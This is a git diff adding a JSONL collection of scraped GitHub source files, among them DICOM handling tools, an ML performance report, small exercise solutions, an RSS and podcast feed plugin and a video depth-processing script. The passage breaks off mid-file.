diff --git "a/3100.jsonl" "b/3100.jsonl" new file mode 100644--- /dev/null +++ "b/3100.jsonl" @@ -0,0 +1,715 @@ +{"seq_id":"74695030439","text":"# -*- coding: utf-8 -*-\n\n\"\"\"Basic helper tools here\n\"\"\"\n\nimport os\nimport datetime\nimport json\nimport glob\nimport datetime\nimport numpy as np\nimport tarfile\nimport zipfile\nimport pydicom as dicom\nfrom tqdm import tqdm\n\n# =========================================================================\n## CONSTANTS\n# =========================================================================\nclass DicomTags(object):\n # these are based on keyword value\n Modality = 0x0008, 0x0060\n Manufacturer = 0x0008, 0x0070\n ManufacturerModelName = 0x0008, 0x1090\n SoftwareVersions = 0x0018, 0x1020\n StudyDescription = 0x0008, 0x1030\n SeriesDescription = 0x0008, 0x103e\n BodyPartExamined = 0x0018, 0x0015\n SliceThickness = 0x0018, 0x0050\n RepetitionTime = 0x0018, 0x0080\n EchoTime = 0x0018, 0x0081\n NumberOfAverages = 0x0018, 0x0083\n MagneticFieldStrength = 0x0018, 0x0087\n SpacingBetweenSlices = 0x0018, 0x0088\n TriggerTime = 0x0018, 0x1060\n NominalInterval = 0x0018, 0x1062\n HeartRate = 0x0018, 0x1088\n CardiacNumberOfImages = 0x0018, 0x1090\n TriggerWindow = 0x0018, 0x1094\n ReceiveCoilName = 0x0018, 0x1250\n AcquisitionMatrix = 0x0018, 0x1310\n FlipAngle = 0x0018, 0x1314\n PatientPosition = 0x0018, 0x5100\n ImagePositionPatient = 0x0020, 0x0032\n ImageOrientationPatient = 0x0020, 0x0037\n StudyInstanceUID = 0x0020, 0x000d\n SeriesInstanceUID = 0x0020, 0x000e\n SeriesNumber = 0x0020, 0x0011\n PixelSpacing = 0x0028, 0x0030\n StudyDate = 0x0008, 0x0020\n PatientName = 0x0010, 0x0010\n PatientID = 0x0010, 0x0020\n PatientDateOfBirth = 0x0010, 0x0030\n PatientSex = 0x0010, 0x0040\n InstanceNumber = 0x0020, 0x0013\n StudyID = 0x0020, 0x0010\n AccessionNumber = 0x0008, 0x0050\n\n\ndef getTagCode(tagName):\n return eval(\"DicomTags.%s\" % (tagName))\n\n\ndef getStdDicomTags():\n allVar = vars(DicomTags)\n res = []\n for 
iVar in allVar:\n val = getTagCode(iVar)\n if type(val) == tuple:\n if len(val) == 2:\n res.append(iVar)\n return res\n\n\ndef getDicomTagsDict():\n tt = getStdDicomTags()\n return dict(zip([i for i in tt], [eval(\"DicomTags.%s\" % (i)) for i in tt]))\n\n\ndef countFilesInDir(dirName):\n files = []\n if os.path.isdir(dirName):\n for path, dirs, filenames in os.walk(dirName): # @UnusedVariable\n files.extend(filenames)\n return len(files)\n\nclass NumpyEncoder(json.JSONEncoder):\n \"\"\" Special json encoder for numpy types \"\"\"\n def default(self, obj):\n self.ensure_ascii = False\n if isinstance(obj, np.integer):\n return int(obj)\n elif isinstance(obj, np.floating):\n return float(obj)\n elif isinstance(obj, np.ndarray):\n return obj.tolist()\n return json.JSONEncoder.default(self, obj)\n\n\ndef writeDictionaryToJSON(fileName, dictToWrite):\n with open(fileName, 'w') as fp:\n json.dump(dictToWrite, fp, indent=4, sort_keys=True, cls=NumpyEncoder, ensure_ascii=False)\n return fileName\n\ndef parseJsonToDictionary(fileName):\n with open(fileName, 'r') as fid:\n myDict = json.load(fid)\n return myDict\n\ndef fixPath(p):\n return p.encode('utf8', 'ignore').strip().decode()\n\ndef cleanString(ss):\n if not type(ss) == str:\n return ss\n ss = ss.replace('^', '-')\n ss = ss.replace(' ', '_')\n keepcharacters = ('-', '.', '_', 'ö','ü','ä','é','è','à')\n ss = \"\".join([c for c in ss if (c.isalnum() or (c.lower() in keepcharacters))]).rstrip()\n try:\n if ss[-1] == '.':\n ss = ss[:-1]\n except IndexError:\n pass\n return fixPath(ss)\n\n\ndef dbDateToDateTime(dbDate):\n try:\n return datetime.datetime.strptime(dbDate, '%Y%m%d')\n except ValueError:\n return datetime.datetime.strptime(dbDate, '%Y%m%dT%H%M%S')\n\n\ndef distPts(pt1, pt2):\n try:\n dist = np.sqrt((pt1[0] - pt2[0]) ** 2 + (pt1[1] - pt2[1]) ** 2 + (pt1[2] - pt2[2]) ** 2)\n except IndexError:\n dist = np.sqrt((pt1[0] - pt2[0]) ** 2 + (pt1[1] - pt2[1]) ** 2)\n return dist\n\n\ndef _isCompressed(ds):\n \"\"\"\n 
Check if dicom dataset is compressed or not\n \"\"\"\n uncompressed_types = [\"1.2.840.10008.1.2\",\n \"1.2.840.10008.1.2.1\",\n \"1.2.840.10008.1.2.1.99\",\n \"1.2.840.10008.1.2.2\"]\n\n if ('TransferSyntaxUID' in ds.file_meta) and (ds.file_meta.TransferSyntaxUID in uncompressed_types):\n return False\n elif 'TransferSyntaxUID' not in ds.file_meta:\n return False\n return True\n\ndef instanceNumberSortKey(val):\n try:\n return int(__getTags(val, ['InstanceNumber'])['InstanceNumber'])\n except (ValueError, IOError, AttributeError):\n return 99e99\n\ndef sliceLoc_InstanceNumberSortKey(val):\n try:\n return (float(__getTags(val, ['SliceLocation'])['SliceLocation']), float(__getTags(val, ['InstanceNumber'])['InstanceNumber']))\n except (ValueError, IOError, AttributeError):\n return (99e9, 99e9)\n\ndef __getTags(dataset, tagsList):\n tagsDict = {}\n for iKey in tagsList:\n tagsDict[iKey] = dataset.get(iKey, 'Unknown')\n return tagsDict\n\n\ndef getRootDirWithSEdirs(startDir):\n \"\"\"\n Search from startDir until find rootDir with format of subdirs:\n SE123_\n ... 
etc\n param1: start directory of search\n return: rootdirectory with subfolders of SE{int}_ format (startDir if not found)\n \"\"\"\n\n def __isSEDirFormat(dd):\n if dd[:2] == \"SE\":\n try:\n int(dd.split(\"_\")[0][2:])\n except ValueError:\n return False\n return True\n return False\n\n dicomRootDir = startDir\n for root, dirs, _ in os.walk(startDir):\n if any([__isSEDirFormat(dd) for dd in dirs]):\n dicomRootDir = root\n break\n return dicomRootDir\n\n\ndef seriesNumbersToDicomDirList(dicomRootDir, seriesNumbers):\n if not type(seriesNumbers) == list:\n seriesNumbers = [seriesNumbers]\n dicomRootDir = getRootDirWithSEdirs(dicomRootDir)\n SEList = os.listdir(dicomRootDir)\n dicomDirs = []\n for iSE in seriesNumbers:\n ii = [jj for jj in SEList if \"SE%d\" % (iSE) in jj.split('_')]\n dicomDirs.append(os.path.join(dicomRootDir, ii[0]))\n return dicomDirs\n\n\ndef walkdir(folder):\n \"\"\"Walk through each files in a directory\"\"\"\n for dirpath, _, files in os.walk(folder):\n for filename in files:\n yield os.path.abspath(os.path.join(dirpath, filename))\n\n\ndef getDicomDictFromTar(tarFileToRead, QUIET=True, FORCE_READ=False, FIRST_ONLY=False, OVERVIEW_ONLY=False,\n matchingTagValuePair=None):\n # for sub dir in tar get first dicom - return list of ds\n dsDict = {}\n if tarFileToRead.endswith('gz'):\n tar = tarfile.open(tarFileToRead, \"r:gz\")\n else:\n tar = tarfile.open(tarFileToRead)\n successReadDirs = set()\n for member in tar:\n if member.isfile():\n root = os.path.split(member.name)[0]\n if FIRST_ONLY and (root in successReadDirs):\n continue\n thisFile=tar.extractfile(member)\n try:\n dataset = dicom.read_file(thisFile, stop_before_pixels=OVERVIEW_ONLY, force=FORCE_READ)#, specific_tags=['StudyInstanceUID','SeriesInstanceUID'])\n if matchingTagValuePair is not None:\n if dataset.get(matchingTagValuePair[0], 'NIL') != matchingTagValuePair[1]:\n continue\n studyUID = str(dataset.StudyInstanceUID)\n seriesUID = str(dataset.SeriesInstanceUID)\n if studyUID 
not in dsDict:\n dsDict[studyUID] = {}\n if seriesUID not in dsDict[studyUID]:\n dsDict[studyUID][seriesUID] = []\n dsDict[studyUID][seriesUID].append(dataset)\n\n if FIRST_ONLY:\n successReadDirs.add(root)\n except dicom.filereader.InvalidDicomError:\n if not QUIET:\n print('FAIL: %s'%(thisFile))\n tar.close()\n return dsDict\n\n\ndef getDicomDictFromZip(zipFileToRead, QUIET=True, FORCE_READ=False, FIRST_ONLY=False, OVERVIEW_ONLY=False,\n matchingTagValuePair=None):\n \"\"\"Read a zip archive, extract dicoms to structures dictionary\n \"\"\"\n dsDict = {}\n with zipfile.ZipFile(zipFileToRead) as zf:\n for file in zf.namelist():\n with zf.open(file) as thisFile:\n try:\n dataset = dicom.read_file(thisFile, stop_before_pixels=OVERVIEW_ONLY, force=FORCE_READ)\n if matchingTagValuePair is not None:\n if dataset.get(matchingTagValuePair[0], 'NIL') != matchingTagValuePair[1]:\n continue\n studyUID = str(dataset.StudyInstanceUID)\n seriesUID = str(dataset.SeriesInstanceUID)\n if studyUID not in dsDict:\n dsDict[studyUID] = {}\n if seriesUID not in dsDict[studyUID]:\n dsDict[studyUID][seriesUID] = []\n dsDict[studyUID][seriesUID].append(dataset)\n\n if FIRST_ONLY:\n return dsDict\n except dicom.filereader.InvalidDicomError:\n if not QUIET:\n print('FAIL: %s'%(thisFile))\n return dsDict\n\ndef anonymiseDicomDS(dataset, anon_birthdate=True, remove_private_tags=True, anonName=None):\n # Define call-back functions for the dataset.walk() function\n def PN_callback(ds, data_element):\n \"\"\"Called from the dataset \"walk\" recursive function for all data elements.\"\"\"\n if data_element.VR == \"PN\":\n data_element.value = 'anonymous'\n if \"Institution\" in data_element.name:\n data_element.value = 'anonymous'\n if (anonName is not None) & (data_element.name == \"Patient's Name\"):\n data_element.value = anonName\n # Remove patient name and any other person names\n try:\n dataset.walk(PN_callback)\n except TypeError: # TODO config setting to control level of warnings for 
this. \n pass\n # Change ID\n dataset.PatientID = ''\n # Remove data elements (should only do so if DICOM type 3 optional)\n # Use general loop so easy to add more later\n # Could also have done: del ds.OtherPatientIDs, etc.\n for name in ['OtherPatientIDs', 'OtherPatientIDsSequence', 'PatientAddress']:\n if name in dataset:\n delattr(dataset, name)\n if anon_birthdate:\n for name in ['PatientBirthDate']:\n if name in dataset:\n dataset.data_element(name).value = ''\n # Remove private tags if function argument says to do so.\n if remove_private_tags:\n try:\n dataset.remove_private_tags()\n except TypeError:\n pass\n return dataset\n\ndef getSaveFileNameFor_ds_UID(ds, outputRootDir):\n destFile = os.path.join(outputRootDir, ds.PatientID, ds.StudyInstanceUID, ds.SeriesInstanceUID, __getDSSaveFileName(ds, SAFE_NAMING=True))\n return destFile\n\ndef getSaveFileNameFor_ds(ds, outputRootDir):\n destFile = os.path.join(outputRootDir, getPatientDirName(ds), getStudyDirName(ds), getSeriesDirName(ds), __getDSSaveFileName(ds, SAFE_NAMING=False))\n return destFile\n\ndef getPatientDirName(ds):\n try:\n return cleanString(f'{ds[DicomTags.PatientName].value}_{ds[DicomTags.PatientID].value}')\n except (TypeError, KeyError, AttributeError):\n try:\n return ds.PatientID\n except AttributeError:\n return ''\n \ndef getStudyDirName(ds):\n try:\n \n return cleanString(f'{ds[DicomTags.StudyDate].value}_{ds[DicomTags.StudyID].value}')\n except (TypeError, KeyError, AttributeError):\n return ds.StudyInstanceUID\n \ndef getSeriesDirName(ds):\n try:\n return cleanString(f'SE{ds[DicomTags.SeriesNumber].value}_{ds[DicomTags.SeriesDescription].value}')\n except (TypeError, KeyError, AttributeError):\n return ds.SeriesInstanceUID\n \n\ndef __getDSSaveFileName_Safe(ds):\n return 'IM-%s.dcm'%(ds.SOPInstanceUID)\n\ndef __getDSSaveFileName(ds, SAFE_NAMING):\n if SAFE_NAMING:\n return __getDSSaveFileName_Safe(ds)\n try:\n return 'IM-%05d-%05d.dcm'%(int(ds.SeriesNumber),\n int(ds.InstanceNumber))\n 
except (TypeError, KeyError, AttributeError):\n return __getDSSaveFileName_Safe(ds)\n\ndef getDicomFileIdentifierStr(ds):\n strOut = f'{ds[DicomTags.PatientName].value}_{ds[DicomTags.PatientID].value}_' +\\\n f'{ds[DicomTags.StudyDate].value}_{ds[DicomTags.SeriesNumber].value}_{ds[DicomTags.InstanceNumber].value}'\n return cleanString(strOut)\n\ndef writeOut_ds(ds, outputRootDir, anonName=None, WRITE_LIKE_ORIG=True, SAFE_NAMING=False):\n destFile = os.path.join(outputRootDir, __getDSSaveFileName(ds, SAFE_NAMING))\n os.makedirs(outputRootDir, exist_ok=True)\n if anonName is not None:\n try:\n ds = anonymiseDicomDS(ds, anonName=anonName)\n except NotImplementedError:\n pass\n ds.save_as(destFile, write_like_original=WRITE_LIKE_ORIG)\n return destFile\n\ndef streamDicoms(inputDir, outputDir, FORCE_READ=False, HIDE_PROGRESSBAR=False, SAFE_NAMING=False):\n nFiles = countFilesInDir(inputDir)\n for thisFile in tqdm(walkdir(inputDir), total=nFiles, leave=True, disable=HIDE_PROGRESSBAR):\n if 'dicomdir' in os.path.split(thisFile)[1].lower():\n continue\n if thisFile.endswith('json'):\n continue\n try:\n dataset = dicom.dcmread(thisFile, force=FORCE_READ, stop_before_pixels=False)\n if SAFE_NAMING: \n fOut = getSaveFileNameFor_ds_UID(dataset, outputDir)\n else:\n fOut = getSaveFileNameFor_ds(dataset, outputDir)\n os.makedirs(os.path.split(fOut)[0], exist_ok=True)\n dataset.save_as(fOut, write_like_original=False)\n except dicom.filereader.InvalidDicomError:\n continue\n\ndef readDicomFile_intoDict(dcmFile, dsDict, FORCE_READ=False, OVERVIEW=False):\n # Reading specific tags is actually slower. 
\n # dataset = dicom.dcmread(thisFile, specific_tags=['StudyInstanceUID','SeriesInstanceUID'], stop_before_pixels=OVERVIEW, force=FORCE_READ)\n dataset = dicom.dcmread(dcmFile, stop_before_pixels=OVERVIEW, force=FORCE_READ)\n studyUID = str(dataset.StudyInstanceUID)\n seriesUID = str(dataset.SeriesInstanceUID)\n if studyUID not in dsDict:\n dsDict[studyUID] = {}\n if seriesUID not in dsDict[studyUID]:\n dsDict[studyUID][seriesUID] = []\n dsDict[studyUID][seriesUID].append(dataset)\n\ndef organiseDicomHeirachyByUIDs(rootDir, HIDE_PROGRESSBAR=False, FORCE_READ=False, ONE_FILE_PER_DIR=False, OVERVIEW=False, DEBUG=False):\n dsDict = {}\n successReadDirs = set()\n nFiles = countFilesInDir(rootDir)\n for thisFile in tqdm(walkdir(rootDir), total=nFiles, leave=True, disable=HIDE_PROGRESSBAR):\n if 'dicomdir' in os.path.split(thisFile)[1].lower():\n continue\n if thisFile.endswith('json'):\n continue\n if ONE_FILE_PER_DIR:\n thisDir, ff = os.path.split(thisFile)\n if thisDir in successReadDirs:\n continue\n try:\n readDicomFile_intoDict(thisFile, dsDict, FORCE_READ=FORCE_READ, OVERVIEW=OVERVIEW)\n if ONE_FILE_PER_DIR:\n successReadDirs.add(thisDir)\n except dicom.filereader.InvalidDicomError:\n if DEBUG:\n print('Error reading %s'%(thisFile))\n continue\n return dsDict\n\n\ndef _writeDirectoryToNII(dcmDir, outputPath, fileName):\n dcm2niiCmd = \"dcm2nii -p n -e y -d n -x n -o '%s' '%s'\"%(outputPath, dcmDir)\n print('RUNNING: %s'%(dcm2niiCmd))\n os.system(dcm2niiCmd)\n list_of_files = glob.glob(os.path.join(outputPath, '*.nii.gz')) \n latest_file = max(list_of_files, key=os.path.getctime)\n newFileName = os.path.join(outputPath, fileName)\n os.rename(latest_file, newFileName)\n print('Made %s --> as %s'%(latest_file, newFileName))\n return newFileName\n\ndef buildFakeDS():\n meta = dicom.dataset.FileMetaDataset()\n meta.FileMetaInformationVersion = b\"\\x00\\x01\"\n meta.TransferSyntaxUID = (\"1.2.840.10008.1.2.1\") # std transfer uid little endian, implicit vr\n 
meta.ImplementationVersionName = \"spydcmtk\"\n ds = dicom.dataset.FileDataset(f'/tmp/{dicom.uid.generate_uid()}.dcm', {}, file_meta=meta, preamble=b\"\\0\" * 128)\n ds.add_new([0x0008,0x0005], 'CS', 'ISO_IR 100')\n ds.add_new([0x0008,0x0016], 'UI', 'SecondaryCaptureImageStorage')\n ds.add_new([0x0008,0x0018], 'UI', dicom.uid.generate_uid())\n ds.add_new([0x0008,0x0020], 'DA', '20000101')\n ds.add_new([0x0008,0x0030], 'TM', '101010')\n ds.add_new([0x0008,0x0060], 'CS', 'MR')\n ds.add_new([0x0020,0x000d], 'UI', dicom.uid.generate_uid())\n ds.add_new([0x0020,0x000e], 'UI', dicom.uid.generate_uid())\n ds.add_new([0x0028,0x0002], 'US', 1)\n ds.add_new([0x0028,0x0004], 'CS', 'MONOCHROME2')\n ds.add_new([0x0028,0x0103], 'US', 0)\n ##\n ds.add_new([0x0010,0x0010], 'PN', \"TEST^DATA\")\n ds.add_new([0x0010,0x0020], 'LO', '12345')\n ds.fix_meta_info()\n return ds\n\n","repo_name":"fraser29/spydcmtk","sub_path":"spydcmtk/dcmTools.py","file_name":"dcmTools.py","file_ext":"py","file_size_in_byte":17348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"35499236331","text":"import pandas as pd\nimport numpy as np\n\nfrom logger import get_logger\nfrom sklearn.metrics import mean_absolute_percentage_error\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\n# Logger\nlogger = get_logger(__name__)\n\ndef generate_report(modelo,X_test,y_test,score):\n \"\"\"Essa função gera um relatório de performance do modelo de regressão em formato csv e salva no diretório local.\n Além disso essa função gera um gráfico de predições versus valores reais e salva no diretório local.\n\n Parameters\n ----------\n modelo : object\n Modelo já treinado\n X_test : numpy.array\n Features do conjunto de teste\n y_test : numpy.array\n Target do conjunto de teste\n score : numpy.array\n Array com os valore do erro médio absoluto percentual obtidos durante o processo de validação cruzada\n \"\"\"\n try:\n logger.info(\"Criando relatório de 
Performance:\")\n y_pred = modelo.predict(X_test)\n # Vamos calcular o MSE (Mean Squared Error)\n mse = np.mean((y_test - y_pred) ** 2)\n rmse = np.sqrt(mse)\n mape= mean_absolute_percentage_error(y_test, y_pred)\n\n res= pd.DataFrame({'CV Média':[-score.mean()],\n 'CV Std':[score.std()],\n 'Testset-MSE':mse,\n 'Testset-RMSE':rmse,\n 'Testset-MAPE':mape,\n })\n \n \n logger.info(\"Relatório de Performance:\")\n logger.info('\\n \\t'+ res.to_string().replace('\\n', '\\n\\t'))\n\n\n res.to_csv(\"./results.csv\",index=False)\n\n logger.info('Gerando gráficos de Predições vs Target')\n dados = pd.DataFrame({'y_test':y_test,'Predições':y_pred})\n plt.figure(figsize=(18,10))\n sns.lineplot(data=dados, markers=True)\n plt.savefig('./pred_vs_real.png')\n \n except Exception as e:\n logger.critical(f'Não foi possível gerar o relatório de performance',exc_info=True)\n\n","repo_name":"EulerFaria/proficam_aula","sub_path":"training/generate_report.py","file_name":"generate_report.py","file_ext":"py","file_size_in_byte":1990,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"46740800124","text":"class Solution(object):\n def chalkReplacer(self, chalk, k):\n total = 0\n for i in chalk:\n total += i\n remainder = k % total\n if remainder==0:\n return 0\n for i in range(len(chalk)):\n remainder -= chalk[i]\n if remainder < 0:\n return i","repo_name":"genzebalemu/a2sv","sub_path":"prefix sum/student whose replace chalk.py","file_name":"student whose replace chalk.py","file_ext":"py","file_size_in_byte":328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"27837123721","text":"def shares(prompt, type):\n while True:\n try:\n sharenum = type(input(prompt))\n return sharenum\n except ValueError:\n print(\"Invalid number!\")\n\ndef priceinp(sharenum):\n while True:\n try:\n price = input(\"Enter price (dollars, numerator, denominator): \")\n d, n, de = 
price.split()\n d, n, de = int(d), int(n), int(de)\n price = str(d) + \" \" + str(n) + \"/\" + str(de)\n return price\n except ValueError:\n print(\"Invalid price!\")\n\ndef value(pricestr, sharenum):\n while True:\n try: \n pricestr = pricestr.replace(\"/\", \" \")\n d, n, de = pricestr.split()\n value = (int(d) + (int(n) / int(de) ))*sharenum\n value = format(value, '.2f')\n return value\n except ValueError:\n print(\"Invalid price!\")\n \ndef printout(numofshares, price, value):\n print(numofshares, \"shares with market price\", price, \"have value $\" + str(values))\n\ndef again():\n x = input(\"Continue: \")\n x = x.lower()\n if x != 'y':\n return False\n else:\n return True\n\na = True\nwhile a == True:\n numofshares = shares(\"Enter number of shares: \", int)\n price = priceinp(numofshares)\n values = value(price, numofshares)\n printout(numofshares, price, value)\n a = again()","repo_name":"antonbui/Forritun2018","sub_path":"Skilaverkefni4/priceOfStock.py","file_name":"priceOfStock.py","file_ext":"py","file_size_in_byte":1377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"35514523596","text":"import logging\nfrom urllib.parse import urljoin\n\nfrom bs4 import BeautifulSoup\nfrom feedgen.feed import FeedGenerator\n\nlogger = logging.getLogger('flamingo.plugins.Feeds')\n\n\ndef make_urls_absolute(html, base_url):\n soup = BeautifulSoup(html, 'html.parser')\n\n for element in soup.find_all(['img', 'script', 'asciinema-player']):\n try:\n element['src'] = urljoin(base_url, element['src'])\n except KeyError:\n # not all elements might have a src attribute\n continue\n\n for link in soup.find_all('a'):\n try:\n link['href'] = urljoin(base_url, link['href'])\n except KeyError:\n # not all elements might have an href attribute\n continue\n\n return str(soup)\n\n\nclass Feeds:\n def pre_build(self, context):\n FEEDS_DOMAIN = getattr(context.settings, 'FEEDS_DOMAIN', '/')\n FEEDS = 
getattr(context.settings, 'FEEDS', [])\n\n for feed_config in FEEDS:\n try:\n content = {\n 'type': 'feed',\n 'feed_type': feed_config['type'],\n 'output': feed_config['output'],\n 'url': '/' + feed_config['output'],\n }\n\n if 'lang' in feed_config:\n content['lang'] = feed_config['lang']\n\n fg = FeedGenerator()\n\n if 'lang' in feed_config:\n fg.language(feed_config['lang'])\n\n fg.id(feed_config['id'])\n fg.title(feed_config['title'])\n\n # set parameters needed for rss-feeds\n if feed_config['type'] in ['rss', 'podcast']:\n fg.description(feed_config['description'])\n fg.link(href=feed_config['link'], rel='self')\n fg.link(\n href=feed_config['link_alternate'], rel='alternate'\n )\n\n # setup podcast environment\n if feed_config['type'] == 'podcast':\n fg.load_extension('podcast')\n fg.podcast.itunes_image(feed_config['podcast_image'])\n if 'itunes_owner' in feed_config:\n fg.podcast.itunes_owner(**feed_config['itunes_owner'])\n if 'itunes_category' in feed_config:\n fg.podcast.itunes_category(\n feed_config['itunes_category']\n )\n if 'itunes_explicit' in feed_config:\n fg.podcast.itunes_explicit(\n feed_config['itunes_explicit']\n )\n if 'itunes_author' in feed_config:\n fg.podcast.itunes_author(feed_config['itunes_author'])\n\n for i in feed_config['contents'](context):\n fe = fg.add_entry()\n\n # setup required entry attributes\n fe_title = i['title'] or i['content_title']\n\n fe_link = {\n 'href': '{}{}'.format(FEEDS_DOMAIN, i['url']),\n 'rel': 'alternate'\n }\n\n if 'entry-id' in feed_config:\n fe_id = feed_config['entry-id'](i)\n\n else:\n fe_id = i['output']\n\n if 'updated' in feed_config:\n fe_updated = feed_config['updated'](i)\n else:\n fe_updated = ''\n\n if 'published' in feed_config:\n fe_published = feed_config['published'](i)\n else:\n fe_published = ''\n\n if 'podcast' in i:\n fe_podcast_url = i['podcast'].get('url', '')\n fe_podcast_size = i['podcast'].get('size', 0)\n fe_podcast_type = i['podcast'].get(\n 'type', 'audio/mpeg'\n )\n else:\n 
fe_podcast_url = ''\n fe_podcast_size = ''\n # default value; will never be reported as missing\n fe_podcast_type = 'audio/mpeg'\n\n # check entry attributes\n missing_attributes = []\n\n if not fe_id:\n missing_attributes.append('id')\n\n if not fe_title:\n missing_attributes.append('title')\n\n if not fe_updated:\n missing_attributes.append('updated')\n\n if not fe_published:\n missing_attributes.append('published')\n\n if feed_config['type'] == 'podcast':\n if not fe_podcast_url:\n missing_attributes.append('podcast->url')\n if not fe_podcast_size:\n missing_attributes.append('podcast->size')\n\n if missing_attributes:\n logger.error('%s is missing attributes: %s',\n i['path'] or i['i18n_path'] or i,\n ', '.join(missing_attributes))\n\n return\n\n # optional attributes\n fe.id(fe_id)\n fe.title(fe_title)\n fe.updated(fe_updated)\n fe.published(fe_published)\n fe.link(fe_link)\n\n if i['content_body']:\n exitcode, output = context.pre_render(i)\n output = make_urls_absolute(output, fe_link['href'])\n\n if 'html_filter' in feed_config:\n output = feed_config['html_filter'](output)\n fe.content(output, type='html')\n\n if i['authors']:\n for author in i['authors']:\n fe.author({\n 'name': author,\n })\n\n if i['summary']:\n summary = str(i['summary'])\n if 'html_filter' in feed_config:\n summary = feed_config['html_filter'](summary)\n fe.summary(summary, type='html')\n\n if feed_config['type'] == 'podcast':\n fe.enclosure(\n fe_podcast_url,\n str(fe_podcast_size),\n fe_podcast_type,\n )\n\n # generate output\n if feed_config['type'] == 'atom':\n content['content_body'] = fg.atom_str().decode()\n\n elif feed_config['type'] in ['rss', 'podcast']:\n content['content_body'] = fg.rss_str().decode()\n else:\n raise ValueError(f'Unkown Feed type {feed_config[\"type\"]}')\n\n context.contents.add(**content)\n\n except Exception:\n logger.error(\"feed '%s' setup failed\", feed_config['id'],\n 
exc_info=True)\n","repo_name":"pengutronix/flamingo","sub_path":"flamingo/plugins/feeds.py","file_name":"feeds.py","file_ext":"py","file_size_in_byte":7299,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"18"} +{"seq_id":"74472314919","text":"# script2_find.py\n# find the best and worst idea based on sentiment analysis\n\n# modules\nimport pandas as pd\nfrom HW3_functions import find_Ideas\n\ndef main():\n # load the data\n df = pd.read_csv('merged_data.csv', index_col=0)\n\n # find ideas\n the_best, the_worst = find_Ideas(df)\n print('The best idea is [', the_best[1], ']')\n print('The polarity of the idea is', the_best[0])\n print()\n print('The worst idea is [', the_worst[1], ']')\n print('The polarity of the idea is', the_worst[0])\n\n return\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Acatsama0871/FE-595-HW3-Sentiment-Sorting","sub_path":"script2_find.py","file_name":"script2_find.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"33821448360","text":"#!/usr/bin/python\n\nfrom utils import extract_frames, downscale_frames, images_to_video, interp_, coords_trans_face\nfrom filter import kf2d, kf3d\nfrom cvd_utils import *\n\nimport subprocess\nimport shutil\nimport os, zipfile, sys\n\n\ndef cvd_main_process():\n # =============================================================================\n # downscale video for openpose\n # =============================================================================\n folder_id = sys.argv[1]\n\n os.environ[\"KMP_DUPLICATE_LIB_OK\"]=\"TRUE\"\n\n #root_dir = os.getcwd()\n root_dir = \"\"\n # root_dir = root_dir + '\\..'\n print(root_dir)\n # clip_id = 3\n # sub_id = 2\n act = 'walking3'\n # path = '../TC_S'+str(sub_id)+'_'+act+'_cam1/'\n path = root_dir + '/temp/'+folder_id+\"/\"\n\n extension = \".zip\"\n for item in os.listdir(path): # loop through items in dir\n 
if item.endswith(extension): # check for \".zip\" extension\n file_name = \"temp/\"+folder_id+\"/\"+item # get full path of files\n print(file_name)\n zip_ref = zipfile.ZipFile(file_name) # create zipfile object\n zip_ref.extractall(path+'CVD_result/') # extract file to dir\n zip_ref.close() # close file\n os.remove(file_name) # delete zipped file\n \n video_file = path + 'step_1_result.mp4'\n # frame_dir = path + '/clip' + str(clip_id) + '/'\n frame_dir = path + 'clip/'\n ext = 'png'\n\n if not os.path.exists(frame_dir): # if not extracted video into frames, do it\n extract_frames(video_file, frame_dir) # video in frames\n\n subdir = frame_dir[:-1] + '_downscale'\n if not os.path.exists(subdir): # if not downscaled, do it\n downscale_frames(\n subdir=subdir, ext=ext, full_subdir=frame_dir\n )\n\n # output_vid_file = 'clip.mp4'\n output_vid_file = root_dir + '/temp/' + folder_id + '/clip.mp4'\n images_to_video(subdir, output_vid_file) # frames back into a video\n\n # if not exist, call openpose with cmd\n # openpose_dir = 'C:/Users/Xulia/Downloads/openpose/'\n openpose_dir = '/openpose/'\n os.chdir(openpose_dir)\n # j2d_dir = 'C:/Users/Xulia/Desktop/maei/az/' + str(clip_id) + '_2dj'\n j2d_dir = root_dir + '/temp/' + folder_id + '/tmp_2dj'\n if not os.path.exists(j2d_dir):\n command = [\n './build/examples/openpose/openpose.bin', '--video', output_vid_file, '--write_json',\n j2d_dir, '--render_pose=0', '--no_gui_verbose', '--display=0', '--cli_verbose=1'\n ]\n print(f'Running \\\"{\" \".join(command)}\\\"')\n subprocess.call(command)\n\n frame_count = len(os.listdir(j2d_dir))\n res = []\n for i in range(frame_count):\n full_file = \"%s/clip_%012d_keypoints.json\" % (j2d_dir, i)\n r = load_torso(full_file)\n res.append(r)\n\n res = np.array(res).reshape(-1, 3)\n\n # =============================================================================\n # change back to project dir\n # replace previous subx, suby with openpose detected joints\n # 
=============================================================================\n\n # os.chdir('E:/2021_Fall/global_motion/src')\n # os.chdir(root_dir)\n os.chdir(\"/\")\n # delete temporal foler and mp4 file\n shutil.rmtree(frame_dir)\n shutil.rmtree(subdir)\n os.remove(output_vid_file)\n\n dt_path = root_dir + '/temp/' + folder_id + '/CVD_result/content/family_run_output'\n num_frames = 500\n frame_Path_midas = dt_path + '/R0-' + str(\n num_frames) + '_hierarchical2_midas2/StD100.0_StR1.0_SmD0_SmR0.0/depth_e0000/depth'\n frame_Path_filtered = dt_path + '/R0-' + str(\n num_frames) + '_hierarchical2_midas2/StD100.0_StR1.0_SmD0_SmR0.0/depth_e0000/e0000_filtered/depth'\n\n # load saved cam_params per frame\n camera_path = dt_path + '/camera_params'\n\n # =============================================================================\n # 1. downsample dynamic masked img to [1, 384, 224]\n # 2. locate ids of 0 in mask, search corredsponding depth at body center\n # 3. load cam params and calculate 3d motion\n # =============================================================================\n # step1:\n # subdir = dt_path + '/dynamic_mask_downscale'\n # full_subdir = dt_path + '/dynamic_mask'\n # ext = 'png'\n # align = 32\n # if not os.path.exists(subdir): #downscale dynamic mask if hasn't done yet\n # downscale_frames(\n # subdir=subdir, ext=ext, full_subdir=full_subdir\n # )\n\n frame_count = 